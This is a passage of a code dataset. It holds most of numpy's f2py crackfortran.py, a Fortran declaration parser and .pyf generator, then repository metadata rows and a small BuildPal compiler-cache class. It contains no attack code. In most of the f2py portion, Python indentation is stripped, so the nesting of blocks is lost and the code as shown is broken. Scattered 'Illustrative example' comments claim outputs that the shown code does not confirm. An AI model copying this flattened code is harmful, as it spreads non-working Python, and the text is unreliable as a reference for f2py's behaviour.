elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
                outmess('\tgetarrlen: variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = '%s%s' % (c2, c1)
elif b < 0:
d = '%s%s-%s' % (c2, c1, -b)
else:
d = '%s%s+%s' % (c2, c1, b)
return d, None, None
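# Illustrative example: length expression for a dimension with bounds
# dl = [lower, upper], here dimension(1:n):
#   getarrlen(['1', 'n'], ['n'])  ->  ('1 * n', 'n', ')/(1)')
# (the caller in analyzevars strips the redundant '1 * ' and '/(1)' parts)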
word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I)
def _get_depend_dict(name, vars, deps):
if name in vars:
words = vars[name].get('depend', [])
if '=' in vars[name] and not isstring(vars[name]):
for word in word_pattern.findall(vars[name]['=']):
if word not in words and word in vars:
words.append(word)
for word in words[:]:
for w in deps.get(word, []) \
or _get_depend_dict(word, vars, deps):
if w not in words:
words.append(w)
else:
outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name)))
words = []
deps[name] = words
return words
def _calc_depend_dict(vars):
names = list(vars.keys())
depend_dict = {}
for n in names:
_get_depend_dict(n, vars, depend_dict)
return depend_dict
def get_sorted_names(vars):
"""
"""
depend_dict = _calc_depend_dict(vars)
names = []
for name in list(depend_dict.keys()):
if not depend_dict[name]:
names.append(name)
del depend_dict[name]
while depend_dict:
for name, lst in list(depend_dict.items()):
new_lst = [n for n in lst if n in depend_dict]
if not new_lst:
names.append(name)
del depend_dict[name]
else:
depend_dict[name] = new_lst
return [name for name in names if name in vars]
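# Illustrative example: a name is emitted only after its dependencies:
#   get_sorted_names({'a': {'depend': ['n']}, 'n': {}})  ->  ['n', 'a']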
def _kind_func(string):
# XXX: return something sensible.
if string[0] in "'\"":
string = string[1:-1]
if real16pattern.match(string):
return 8
elif real8pattern.match(string):
return 4
return 'kind(' + string + ')'
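# Illustrative examples: 'd' exponents imply double precision (kind 8), 'e'
# exponents single precision (kind 4); anything else is left symbolic:
#   _kind_func('1.0d0')  ->  8
#   _kind_func('1.0e0')  ->  4
#   _kind_func("'abc'")  ->  "kind(abc)"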
def _selected_int_kind_func(r):
# XXX: This should be processor dependent
m = 10 ** r
if m <= 2 ** 8:
return 1
if m <= 2 ** 16:
return 2
if m <= 2 ** 32:
return 4
if m <= 2 ** 63:
return 8
if m <= 2 ** 128:
return 16
return -1
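# Illustrative examples, mirroring Fortran's SELECTED_INT_KIND (smallest
# integer kind whose range covers 10**r):
#   _selected_int_kind_func(5)   ->  4
#   _selected_int_kind_func(18)  ->  8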
def _selected_real_kind_func(p, r=0, radix=0):
# XXX: This should be processor dependent
# This is only good for 0 <= p <= 20
if p < 7:
return 4
if p < 16:
return 8
if platform.machine().lower().startswith('power'):
if p <= 20:
return 16
else:
if p < 19:
return 10
elif p <= 20:
return 16
return -1
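# Illustrative examples, mirroring Fortran's SELECTED_REAL_KIND (smallest
# real kind with at least p decimal digits of precision):
#   _selected_real_kind_func(6)   ->  4
#   _selected_real_kind_func(15)  ->  8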
def get_parameters(vars, global_params={}):
params = copy.copy(global_params)
g_params = copy.copy(global_params)
for name, func in [('kind', _kind_func),
('selected_int_kind', _selected_int_kind_func),
('selected_real_kind', _selected_real_kind_func), ]:
if name not in g_params:
g_params[name] = func
param_names = []
for n in get_sorted_names(vars):
if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']:
param_names.append(n)
kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_int_kind_re = re.compile(
r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_kind_re = re.compile(
r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
for n in param_names:
if '=' in vars[n]:
v = vars[n]['=']
if islogical(vars[n]):
v = v.lower()
for repl in [
('.false.', 'False'),
('.true.', 'True'),
# TODO: test .eq., .neq., etc replacements.
]:
v = v.replace(*repl)
v = kind_re.sub(r'kind("\1")', v)
v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v)
if isinteger(vars[n]) and not selected_kind_re.match(v):
v = v.split('_')[0]
if isdouble(vars[n]):
tt = list(v)
for m in real16pattern.finditer(v):
tt[m.start():m.end()] = list(
v[m.start():m.end()].lower().replace('d', 'e'))
v = ''.join(tt)
if iscomplex(vars[n]):
if v[0] == '(' and v[-1] == ')':
                    # FIXME: 'l' is computed but never used; this looks like a potential bug
l = markoutercomma(v[1:-1]).split('@,@')
try:
params[n] = eval(v, g_params, params)
except Exception as msg:
params[n] = v
outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v)))
if isstring(vars[n]) and isinstance(params[n], int):
params[n] = chr(params[n])
nl = n.lower()
if nl != n:
params[nl] = params[n]
else:
print(vars[n])
outmess(
'get_parameters:parameter %s does not have value?!\n' % (repr(n)))
return params
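# Illustrative example (isinteger etc. come from this module's auxiliary
# helpers): an integer parameter with a literal initializer is evaluated to
# a Python value:
#   get_parameters({'n': {'typespec': 'integer',
#                         'attrspec': ['parameter'], '=': '3'}})
#   ->  {'n': 3}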
def _eval_length(length, params):
if length in ['(:)', '(*)', '*']:
return '(*)'
return _eval_scalar(length, params)
_is_kind_number = re.compile(r'\d+_').match
def _eval_scalar(value, params):
if _is_kind_number(value):
value = value.split('_')[0]
try:
value = str(eval(value, {}, params))
except (NameError, SyntaxError):
return value
except Exception as msg:
errmess('"%s" in evaluating %r '
'(available names: %s)\n'
% (msg, value, list(params.keys())))
return value
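# Illustrative examples: kind suffixes are stripped and known parameters are
# substituted; unresolvable expressions are returned unchanged:
#   _eval_scalar('3_8', {})        ->  '3'
#   _eval_scalar('n+1', {'n': 3})  ->  '4'
#   _eval_scalar('m+1', {})        ->  'm+1'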
def analyzevars(block):
global f90modulevars
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
vars = copy.copy(block['vars'])
if block['block'] == 'function' and block['name'] not in vars:
vars[block['name']] = {}
if '' in block['vars']:
del vars['']
if 'attrspec' in block['vars']['']:
gen = block['vars']['']['attrspec']
for n in list(vars.keys()):
for k in ['public', 'private']:
if k in gen:
vars[n] = setattrspec(vars[n], k)
svars = []
args = block['args']
for a in args:
        if a in vars:
            svars.append(a)
for n in list(vars.keys()):
if n not in args:
svars.append(n)
params = get_parameters(vars, get_useparameters(block))
dep_matches = {}
name_match = re.compile(r'\w[\w\d_$]*').match
for v in list(vars.keys()):
m = name_match(v)
if m:
n = v[m.start():m.end()]
            if n not in dep_matches:
                dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match
for n in svars:
if n[0] in list(attrrules.keys()):
vars[n] = setattrspec(vars[n], attrrules[n[0]])
if 'typespec' not in vars[n]:
if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']):
if implicitrules:
ln0 = n[0].lower()
for k in list(implicitrules[ln0].keys()):
if k == 'typespec' and implicitrules[ln0][k] == 'undefined':
continue
if k not in vars[n]:
vars[n][k] = implicitrules[ln0][k]
elif k == 'attrspec':
for l in implicitrules[ln0][k]:
vars[n] = setattrspec(vars[n], l)
elif n in block['args']:
outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % (
repr(n), block['name']))
if 'charselector' in vars[n]:
if 'len' in vars[n]['charselector']:
l = vars[n]['charselector']['len']
try:
l = str(eval(l, {}, params))
                except Exception:
pass
vars[n]['charselector']['len'] = l
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
l = vars[n]['kindselector']['kind']
try:
l = str(eval(l, {}, params))
                except Exception:
pass
vars[n]['kindselector']['kind'] = l
savelindims = {}
if 'attrspec' in vars[n]:
attr = vars[n]['attrspec']
attr.reverse()
vars[n]['attrspec'] = []
dim, intent, depend, check, note = None, None, None, None, None
for a in attr:
if a[:9] == 'dimension':
dim = (a[9:].strip())[1:-1]
elif a[:6] == 'intent':
intent = (a[6:].strip())[1:-1]
elif a[:6] == 'depend':
depend = (a[6:].strip())[1:-1]
elif a[:5] == 'check':
check = (a[5:].strip())[1:-1]
elif a[:4] == 'note':
note = (a[4:].strip())[1:-1]
else:
vars[n] = setattrspec(vars[n], a)
if intent:
if 'intent' not in vars[n]:
vars[n]['intent'] = []
for c in [x.strip() for x in markoutercomma(intent).split('@,@')]:
# Remove spaces so that 'in out' becomes 'inout'
tmp = c.replace(' ', '')
if tmp not in vars[n]['intent']:
vars[n]['intent'].append(tmp)
intent = None
if note:
note = note.replace('\\n\\n', '\n\n')
note = note.replace('\\n ', '\n')
if 'note' not in vars[n]:
vars[n]['note'] = [note]
else:
vars[n]['note'].append(note)
note = None
if depend is not None:
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]):
if c not in vars[n]['depend']:
vars[n]['depend'].append(c)
depend = None
if check is not None:
if 'check' not in vars[n]:
vars[n]['check'] = []
for c in [x.strip() for x in markoutercomma(check).split('@,@')]:
if c not in vars[n]['check']:
vars[n]['check'].append(c)
check = None
if dim and 'dimension' not in vars[n]:
vars[n]['dimension'] = []
for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]):
star = '*'
if d == ':':
star = ':'
if d in params:
d = str(params[d])
for p in list(params.keys()):
re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I)
m = re_1.match(d)
while m:
d = m.group('before') + \
str(params[p]) + m.group('after')
m = re_1.match(d)
if d == star:
dl = [star]
else:
dl = markoutercomma(d, ':').split('@:@')
if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*)
dl = ['*']
d = '*'
if len(dl) == 1 and not dl[0] == star:
dl = ['1', dl[0]]
if len(dl) == 2:
d, v, di = getarrlen(dl, list(block['vars'].keys()))
if d[:4] == '1 * ':
d = d[4:]
if di and di[-4:] == '/(1)':
di = di[:-4]
if v:
savelindims[d] = v, di
vars[n]['dimension'].append(d)
if 'dimension' in vars[n]:
            # both branches use 'shape'; 'fshape' was apparently intended for
            # the non-intent(c) case but is not used
            shape_macro = 'shape'
if isstringarray(vars[n]):
if 'charselector' in vars[n]:
d = vars[n]['charselector']
if '*' in d:
d = d['*']
errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'
% (d, n,
','.join(vars[n]['dimension']),
n, ','.join(vars[n]['dimension'] + [d])))
vars[n]['dimension'].append(d)
del vars[n]['charselector']
if 'intent' not in vars[n]:
vars[n]['intent'] = []
if 'c' not in vars[n]['intent']:
vars[n]['intent'].append('c')
else:
errmess(
"analyzevars: charselector=%r unhandled." % (d))
if 'check' not in vars[n] and 'args' in block and n in block['args']:
flag = 'depend' not in vars[n]
if flag:
vars[n]['depend'] = []
vars[n]['check'] = []
if 'dimension' in vars[n]:
#/----< no check
i = -1
ni = len(vars[n]['dimension'])
for d in vars[n]['dimension']:
                    ddeps = []  # dependencies of 'd'
ad = ''
pd = ''
if d not in vars:
if d in savelindims:
pd, ad = '(', savelindims[d][1]
d = savelindims[d][0]
else:
for r in block['args']:
if r not in vars:
continue
if re.match(r'.*?\b' + r + r'\b', d, re.I):
ddeps.append(r)
if d in vars:
if 'attrspec' in vars[d]:
for aa in vars[d]['attrspec']:
if aa[:6] == 'depend':
ddeps += aa[6:].strip()[1:-1].split(',')
if 'depend' in vars[d]:
ddeps = ddeps + vars[d]['depend']
i = i + 1
if d in vars and ('depend' not in vars[d]) \
and ('=' not in vars[d]) and (d not in vars[n]['depend']) \
and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]):
vars[d]['depend'] = [n]
if ni > 1:
vars[d]['='] = '%s%s(%s,%s)%s' % (
pd, shape_macro, n, i, ad)
else:
vars[d]['='] = '%slen(%s)%s' % (pd, n, ad)
# /---< no check
                        if 'check' not in vars[d]:
if ni > 1:
vars[d]['check'] = ['%s%s(%s,%i)%s==%s'
% (pd, shape_macro, n, i, ad, d)]
else:
vars[d]['check'] = [
'%slen(%s)%s>=%s' % (pd, n, ad, d)]
if 'attrspec' not in vars[d]:
vars[d]['attrspec'] = ['optional']
if ('optional' not in vars[d]['attrspec']) and\
('required' not in vars[d]['attrspec']):
vars[d]['attrspec'].append('optional')
elif d not in ['*', ':']:
#/----< no check
if flag:
if d in vars:
if n not in ddeps:
vars[n]['depend'].append(d)
else:
vars[n]['depend'] = vars[n]['depend'] + ddeps
elif isstring(vars[n]):
length = '1'
if 'charselector' in vars[n]:
if '*' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['*'],
params)
vars[n]['charselector']['*'] = length
elif 'len' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['len'],
params)
del vars[n]['charselector']['len']
vars[n]['charselector']['*'] = length
if not vars[n]['check']:
del vars[n]['check']
if flag and not vars[n]['depend']:
del vars[n]['depend']
if '=' in vars[n]:
if 'attrspec' not in vars[n]:
vars[n]['attrspec'] = []
if ('optional' not in vars[n]['attrspec']) and \
('required' not in vars[n]['attrspec']):
vars[n]['attrspec'].append('optional')
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for v, m in list(dep_matches.items()):
if m(vars[n]['=']):
vars[n]['depend'].append(v)
if not vars[n]['depend']:
del vars[n]['depend']
if isscalar(vars[n]):
vars[n]['='] = _eval_scalar(vars[n]['='], params)
for n in list(vars.keys()):
if n == block['name']: # n is block name
if 'note' in vars[n]:
block['note'] = vars[n]['note']
if block['block'] == 'function':
if 'result' in block and block['result'] in vars:
vars[n] = appenddecl(vars[n], vars[block['result']])
if 'prefix' in block:
pr = block['prefix']
ispure = 0
isrec = 1
pr1 = pr.replace('pure', '')
ispure = (not pr == pr1)
pr = pr1.replace('recursive', '')
isrec = (not pr == pr1)
m = typespattern[0].match(pr)
if m:
typespec, selector, attr, edecl = cracktypespec0(
m.group('this'), m.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
vars[n]['typespec'] = typespec
if kindselect:
if 'kind' in kindselect:
try:
kindselect['kind'] = eval(
kindselect['kind'], {}, params)
                                except Exception:
pass
vars[n]['kindselector'] = kindselect
if charselect:
vars[n]['charselector'] = charselect
if typename:
vars[n]['typename'] = typename
if ispure:
vars[n] = setattrspec(vars[n], 'pure')
if isrec:
vars[n] = setattrspec(vars[n], 'recursive')
else:
outmess(
                            'analyzevars: prefix (%s) was not used\n' % repr(block['prefix']))
if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']:
if 'commonvars' in block:
neededvars = copy.copy(block['args'] + block['commonvars'])
else:
neededvars = copy.copy(block['args'])
for n in list(vars.keys()):
if l_or(isintent_callback, isintent_aux)(vars[n]):
neededvars.append(n)
if 'entry' in block:
neededvars.extend(list(block['entry'].keys()))
for k in list(block['entry'].keys()):
for n in block['entry'][k]:
if n not in neededvars:
neededvars.append(n)
if block['block'] == 'function':
if 'result' in block:
neededvars.append(block['result'])
else:
neededvars.append(block['name'])
if block['block'] in ['subroutine', 'function']:
name = block['name']
if name in vars and 'intent' in vars[name]:
block['intent'] = vars[name]['intent']
if block['block'] == 'type':
neededvars.extend(list(vars.keys()))
for n in list(vars.keys()):
if n not in neededvars:
del vars[n]
return vars
analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I)
def expr2name(a, block, args=[]):
orig_a = a
a_is_expr = not analyzeargs_re_1.match(a)
if a_is_expr: # `a` is an expression
implicitrules, attrrules = buildimplicitrules(block)
at = determineexprtype(a, block['vars'], implicitrules)
na = 'e_'
for c in a:
c = c.lower()
if c not in string.ascii_lowercase + string.digits:
c = '_'
na = na + c
if na[-1] == '_':
na = na + 'e'
else:
na = na + '_e'
a = na
while a in block['vars'] or a in block['args']:
a = a + 'r'
if a in args:
k = 1
while a + str(k) in args:
k = k + 1
a = a + str(k)
if a_is_expr:
block['vars'][a] = at
else:
if a not in block['vars']:
if orig_a in block['vars']:
block['vars'][a] = block['vars'][orig_a]
else:
block['vars'][a] = {}
if 'externals' in block and orig_a in block['externals'] + block['interfaced']:
block['vars'][a] = setattrspec(block['vars'][a], 'external')
return a
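# Worked example for expr2name above: the argument expression 'n+1' is not a
# plain name, so a name is generated from the seed 'e_' plus each character
# mapped into [a-z0-9] (others become '_'), giving 'e_n_1'; the last
# character is not '_', so '_e' is appended and the result is 'e_n_1_e'
# (with 'r'/digit suffixes added on collisions with existing names).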
def analyzeargs(block):
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
if 'args' not in block:
block['args'] = []
args = []
for a in block['args']:
a = expr2name(a, block, args)
args.append(a)
block['args'] = args
if 'entry' in block:
for k, args1 in list(block['entry'].items()):
for a in args1:
if a not in block['vars']:
block['vars'][a] = {}
for b in block['body']:
if b['name'] in args:
if 'externals' not in block:
block['externals'] = []
if b['name'] not in block['externals']:
block['externals'].append(b['name'])
if 'result' in block and block['result'] not in block['vars']:
block['vars'][block['result']] = {}
return block
determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I)
determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_3 = re.compile(
    r'\A[+-]?[\d.]+[-\d+de.]*(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I)
determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I)
def _ensure_exprdict(r):
if isinstance(r, int):
return {'typespec': 'integer'}
if isinstance(r, float):
return {'typespec': 'real'}
if isinstance(r, complex):
return {'typespec': 'complex'}
if isinstance(r, dict):
return r
raise AssertionError(repr(r))
def determineexprtype(expr, vars, rules={}):
if expr in vars:
return _ensure_exprdict(vars[expr])
expr = expr.strip()
if determineexprtype_re_1.match(expr):
return {'typespec': 'complex'}
m = determineexprtype_re_2.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'integer'}
m = determineexprtype_re_3.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'real'}
for op in ['+', '-', '*', '/']:
for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]:
if e in vars:
return _ensure_exprdict(vars[e])
t = {}
if determineexprtype_re_4.match(expr): # in parenthesis
t = determineexprtype(expr[1:-1], vars, rules)
else:
m = determineexprtype_re_5.match(expr)
if m:
rn = m.group('name')
t = determineexprtype(m.group('name'), vars, rules)
if t and 'attrspec' in t:
del t['attrspec']
if not t:
if rn[0] in rules:
return _ensure_exprdict(rules[rn[0]])
if expr[0] in '\'"':
return {'typespec': 'character', 'charselector': {'*': '*'}}
    if not t:
        outmess(
            'determineexprtype: could not determine the type of expression (%s).\n' % (repr(expr)))
return t
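# Worked examples for determineexprtype above (assuming empty vars/rules):
#   determineexprtype('2', {})         -> {'typespec': 'integer'}
#   determineexprtype('(1.0,0.0)', {}) -> {'typespec': 'complex'}
#   determineexprtype("'abc'", {})     -> {'typespec': 'character',
#                                          'charselector': {'*': '*'}}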
######
def crack2fortrangen(block, tab='\n', as_interface=False):
global skipfuncs, onlyfuncs
setmesstext(block)
ret = ''
if isinstance(block, list):
for g in block:
if g and g['block'] in ['function', 'subroutine']:
if g['name'] in skipfuncs:
continue
if onlyfuncs and g['name'] not in onlyfuncs:
continue
ret = ret + crack2fortrangen(g, tab, as_interface=as_interface)
return ret
prefix = ''
name = ''
args = ''
blocktype = block['block']
if blocktype == 'program':
return ''
argsl = []
if 'name' in block:
name = block['name']
if 'args' in block:
vars = block['vars']
for a in block['args']:
a = expr2name(a, block, argsl)
if not isintent_callback(vars[a]):
argsl.append(a)
if block['block'] == 'function' or argsl:
args = '(%s)' % ','.join(argsl)
f2pyenhancements = ''
if 'f2pyenhancements' in block:
for k in list(block['f2pyenhancements'].keys()):
f2pyenhancements = '%s%s%s %s' % (
f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k])
intent_lst = block.get('intent', [])[:]
if blocktype == 'function' and 'callback' in intent_lst:
intent_lst.remove('callback')
if intent_lst:
f2pyenhancements = '%s%sintent(%s) %s' %\
(f2pyenhancements, tab + tabchar,
','.join(intent_lst), name)
use = ''
if 'use' in block:
use = use2fortran(block['use'], tab + tabchar)
common = ''
if 'common' in block:
common = common2fortran(block['common'], tab + tabchar)
if name == 'unknown_interface':
name = ''
result = ''
if 'result' in block:
result = ' result (%s)' % block['result']
if block['result'] not in argsl:
argsl.append(block['result'])
body = crack2fortrangen(block['body'], tab + tabchar)
vars = vars2fortran(
block, block['vars'], argsl, tab + tabchar, as_interface=as_interface)
mess = ''
if 'from' in block and not as_interface:
mess = '! in %s' % block['from']
if 'entry' in block:
entry_stmts = ''
for k, i in list(block['entry'].items()):
entry_stmts = '%s%sentry %s(%s)' \
% (entry_stmts, tab + tabchar, k, ','.join(i))
body = body + entry_stmts
if blocktype == 'block data' and name == '_BLOCK_DATA_':
name = ''
ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % (
tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name)
return ret
def common2fortran(common, tab=''):
ret = ''
for k in list(common.keys()):
if k == '_BLNK_':
ret = '%s%scommon %s' % (ret, tab, ','.join(common[k]))
else:
ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k]))
return ret
def use2fortran(use, tab=''):
ret = ''
for m in list(use.keys()):
ret = '%s%suse %s,' % (ret, tab, m)
if use[m] == {}:
if ret and ret[-1] == ',':
ret = ret[:-1]
continue
if 'only' in use[m] and use[m]['only']:
ret = '%s only:' % (ret)
if 'map' in use[m] and use[m]['map']:
c = ' '
for k in list(use[m]['map'].keys()):
if k == use[m]['map'][k]:
ret = '%s%s%s' % (ret, c, k)
c = ','
else:
ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k])
c = ','
if ret and ret[-1] == ',':
ret = ret[:-1]
return ret
def true_intent_list(var):
lst = var['intent']
ret = []
for intent in lst:
try:
c = eval('isintent_%s(var)' % intent)
except NameError:
c = 0
if c:
ret.append(intent)
return ret
def vars2fortran(block, vars, args, tab='', as_interface=False):
"""
TODO:
public sub
...
"""
setmesstext(block)
ret = ''
nout = []
for a in args:
if a in block['vars']:
nout.append(a)
if 'commonvars' in block:
for a in block['commonvars']:
if a in vars:
if a not in nout:
nout.append(a)
else:
errmess(
'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a)
if 'varnames' in block:
nout.extend(block['varnames'])
if not as_interface:
for a in list(vars.keys()):
if a not in nout:
nout.append(a)
for a in nout:
if 'depend' in vars[a]:
for d in vars[a]['depend']:
if d in vars and 'depend' in vars[d] and a in vars[d]['depend']:
errmess(
'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d))
if 'externals' in block and a in block['externals']:
if isintent_callback(vars[a]):
ret = '%s%sintent(callback) %s' % (ret, tab, a)
ret = '%s%sexternal %s' % (ret, tab, a)
if isoptional(vars[a]):
ret = '%s%soptional %s' % (ret, tab, a)
if a in vars and 'typespec' not in vars[a]:
continue
cont = 1
for b in block['body']:
if a == b['name'] and b['block'] == 'function':
cont = 0
break
if cont:
continue
if a not in vars:
show(vars)
outmess('vars2fortran: No definition for argument "%s".\n' % a)
continue
if a == block['name'] and not block['block'] == 'function':
continue
if 'typespec' not in vars[a]:
if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']:
if a in args:
ret = '%s%sexternal %s' % (ret, tab, a)
continue
show(vars[a])
outmess('vars2fortran: No typespec for argument "%s".\n' % a)
continue
vardef = vars[a]['typespec']
if vardef == 'type' and 'typename' in vars[a]:
vardef = '%s(%s)' % (vardef, vars[a]['typename'])
selector = {}
if 'kindselector' in vars[a]:
selector = vars[a]['kindselector']
elif 'charselector' in vars[a]:
selector = vars[a]['charselector']
if '*' in selector:
if selector['*'] in ['*', ':']:
vardef = '%s*(%s)' % (vardef, selector['*'])
else:
vardef = '%s*%s' % (vardef, selector['*'])
else:
if 'len' in selector:
vardef = '%s(len=%s' % (vardef, selector['len'])
if 'kind' in selector:
vardef = '%s,kind=%s)' % (vardef, selector['kind'])
else:
vardef = '%s)' % (vardef)
elif 'kind' in selector:
vardef = '%s(kind=%s)' % (vardef, selector['kind'])
c = ' '
if 'attrspec' in vars[a]:
attr = []
for l in vars[a]['attrspec']:
if l not in ['external']:
attr.append(l)
if attr:
vardef = '%s, %s' % (vardef, ','.join(attr))
c = ','
if 'dimension' in vars[a]:
vardef = '%s%sdimension(%s)' % (
vardef, c, ','.join(vars[a]['dimension']))
c = ','
if 'intent' in vars[a]:
lst = true_intent_list(vars[a])
if lst:
vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst))
c = ','
if 'check' in vars[a]:
vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check']))
c = ','
if 'depend' in vars[a]:
vardef = '%s%sdepend(%s)' % (
vardef, c, ','.join(vars[a]['depend']))
c = ','
if '=' in vars[a]:
v = vars[a]['=']
if vars[a]['typespec'] in ['complex', 'double complex']:
try:
v = eval(v)
v = '(%s,%s)' % (v.real, v.imag)
                except Exception:
                    pass
vardef = '%s :: %s=%s' % (vardef, a, v)
else:
vardef = '%s :: %s' % (vardef, a)
ret = '%s%s%s' % (ret, tab, vardef)
return ret
######
def crackfortran(files):
global usermodules
outmess('Reading fortran codes...\n', 0)
readfortrancode(files, crackline)
outmess('Post-processing...\n', 0)
usermodules = []
postlist = postcrack(grouplist[0])
outmess('Post-processing (stage 2)...\n', 0)
postlist = postcrack2(postlist)
return usermodules + postlist
def crack2fortran(block):
global f2py_version
pyf = crack2fortrangen(block) + '\n'
header = """! -*- f90 -*-
! Note: the content of this file is case sensitive.
"""
footer = """
! This file was auto-generated with f2py (version:%s).
! See http://cens.ioc.ee/projects/f2py2e/
""" % (f2py_version)
return header + pyf + footer
if __name__ == "__main__":
    files = []
    funcs = []
    f = 1
    f2 = 0
    f3 = 0
    showblocklist = 0
    pyffilename = ''
    f77modulename = ''
for l in sys.argv[1:]:
if l == '':
pass
elif l[0] == ':':
f = 0
elif l == '-quiet':
quiet = 1
verbose = 0
elif l == '-verbose':
verbose = 2
quiet = 0
elif l == '-fix':
if strictf77:
outmess(
'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0)
skipemptyends = 1
sourcecodeform = 'fix'
elif l == '-skipemptyends':
skipemptyends = 1
elif l == '--ignore-contains':
ignorecontains = 1
elif l == '-f77':
strictf77 = 1
sourcecodeform = 'fix'
elif l == '-f90':
strictf77 = 0
sourcecodeform = 'free'
skipemptyends = 1
elif l == '-h':
f2 = 1
elif l == '-show':
showblocklist = 1
elif l == '-m':
f3 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
elif f2:
f2 = 0
pyffilename = l
elif f3:
f3 = 0
f77modulename = l
elif f:
try:
open(l).close()
files.append(l)
except IOError as detail:
errmess('IOError: %s\n' % str(detail))
else:
funcs.append(l)
if not strictf77 and f77modulename and not skipemptyends:
        outmess("""\
Warning: You have specified a module name for non-Fortran-77 code
that should not need one (except if you are scanning F90 code
for non-module blocks; in that case you should use the flag -skipemptyends
and also be sure that the files do not contain programs without a program statement).
""", 0)
    postlist = crackfortran(files)
    if pyffilename:
        outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0)
        pyf = crack2fortran(postlist)
        with open(pyffilename, 'w') as f:
            f.write(pyf)
if showblocklist:
show(postlist)
|
kiwifb/numpy
|
numpy/f2py/crackfortran.py
|
Python
|
bsd-3-clause
| 126,846
|
import os
import tempfile
import hashlib
import pickle
from collections import defaultdict
class CompilerRepository:
def __init__(self):
self.__dir = os.path.join(tempfile.gettempdir(), 'BuildPal', 'Compilers')
self.__compilers = set()
self.__partial_compilers = set()
self.__waiters = defaultdict(list)
self.__id_cache = {}
def __unique_id(self, compiler_id):
result = self.__id_cache.get(compiler_id)
if result is None:
result = hashlib.md5(pickle.dumps(compiler_id)).hexdigest()
self.__id_cache[compiler_id] = result
return result
def compiler_dir(self, compiler_id):
return os.path.join(self.__dir, self.__unique_id(compiler_id))
def compiler_required(self, compiler_id):
id = self.__unique_id(compiler_id)
if id in self.__compilers:
assert os.path.exists(self.compiler_dir(compiler_id))
return False
if os.path.exists(self.compiler_dir(compiler_id)):
self.__compilers.add(id)
return False
if id in self.__partial_compilers:
return False
self.__partial_compilers.add(id)
return True
def when_compiler_is_ready(self, compiler_id, handler):
id = self.__unique_id(compiler_id)
assert id in self.__compilers or id in self.__partial_compilers
if id in self.__compilers:
handler()
else:
self.__waiters[id].append(handler)
def set_compiler_ready(self, compiler_id):
id = self.__unique_id(compiler_id)
assert id in self.__partial_compilers
assert id not in self.__compilers
assert os.path.exists(self.compiler_dir(compiler_id))
self.__partial_compilers.remove(id)
self.__compilers.add(id)
for handler in self.__waiters[id]:
handler()
del self.__waiters[id]
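# Usage sketch (hypothetical compiler id; any picklable value works, since
# ids are hashed via pickle + md5 above). A minimal happy path, assuming the
# caller populates compiler_dir() on disk before declaring it ready:
#
#   repo = CompilerRepository()
#   compiler_id = ('msvc', '19.29', 'x64')   # illustrative only
#   if repo.compiler_required(compiler_id):
#       # ... copy the toolchain into repo.compiler_dir(compiler_id) ...
#       repo.set_compiler_ready(compiler_id)
#   repo.when_compiler_is_ready(compiler_id, lambda: print('compiler ready'))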
|
pkesist/buildpal
|
Python/buildpal/server/compiler_repository.py
|
Python
|
gpl-3.0
| 1,976
|
